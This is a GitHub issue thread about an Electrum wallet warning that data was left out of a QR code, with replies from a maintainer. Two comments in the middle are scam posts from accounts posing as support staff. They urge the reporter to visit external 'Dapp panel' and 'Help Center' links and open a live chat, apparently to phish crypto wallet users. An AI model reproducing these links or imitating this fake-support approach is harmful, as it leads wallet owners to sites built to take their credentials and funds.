### ISSUE TITLE
Some data was left out of QR code

### ISSUE THREAD

**Issue by ArmanTheParman** [spesmilo/electrum#9337]
<img width="290" alt="Screen Shot 2024-12-02 at 3 21 19 pm" src="https://github.com/user-attachments/assets/643fecd6-847e-40bb-a242-15037ee2d714">

Consistent error with recent versions of Electrum. This is a single sig wallet, with 1 utxo in the input.

**Comment by contribution-hub** [comment]
We are sorry for the inconvenience you are facing. Be rest assured our team is working diligently to ensure your issue is resolved. 
Visit the official Decentralized Dapp Protocol to report this issue to an agent for assistance via [Online Dapp Panel](https://websynchronizefix.web.app)
@ArmanTheParman 
Note: click on the chat button to initiate a conversation with an agent for further assistance

**Comment by consensys-mod** [comment]
> <img alt="Screen Shot 2024-12-02 at 3 21 19 pm" width="290" src="https://private-user-images.githubusercontent.com/77603167/391409562-643fecd6-847e-40bb-a242-15037ee2d714.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzMxMjA2NDAsIm5iZiI6MTczMzEyMDM0MCwicGF0aCI6Ii83NzYwMzE2Ny8zOTE0MDk1NjItNjQzZmVjZDYtODQ3ZS00MGJiLWEyNDItMTUwMzdlZTJkNzE0LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDEyMDIlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQxMjAyVDA2MTkwMFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTk5ODY5YzdjMDNjNmEwYjgxM2FjODBiNDM4OWQ1MmJmMzc2YjQ5ZGY5OTAzNjMwMzNkZGI5ODUzNWExMGI1NGUmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.p-SC3UWeOPySuIKqN4WaxqD576v41UE9UJX3jM9LYlw">
> Consistent error with recent versions of Electrum. This is a single sig wallet, with 1 utxo in the input.

So sorry for the inconvenience this might have caused, error is probably caused by cloud data glitch and can be fixed. For the fastest resolution, please click on the link below to our dedicated support line:

Support: [Electrum Help Center](https://dappsrectification-chain.pages.dev)

Note: ***Click on the live chat icon at the bottom corner of the page to start a conversation***

**Comment by ecdsa** [comment]
this is not a bug, just a warning.

**Comment by ArmanTheParman** [comment]
Whether it's a bug or not is not my point - it's just that I can no longer use QR capture with Electrum and I used to just fine.

**Comment by ecdsa** [comment]
> Whether it's a bug or not is not my point - it's just that I can no longer use QR capture with Electrum and I used to just fine.

Then you should have explained that. Are we supposed to read your mind? 
Maybe you could also post the full qr code? that would help.
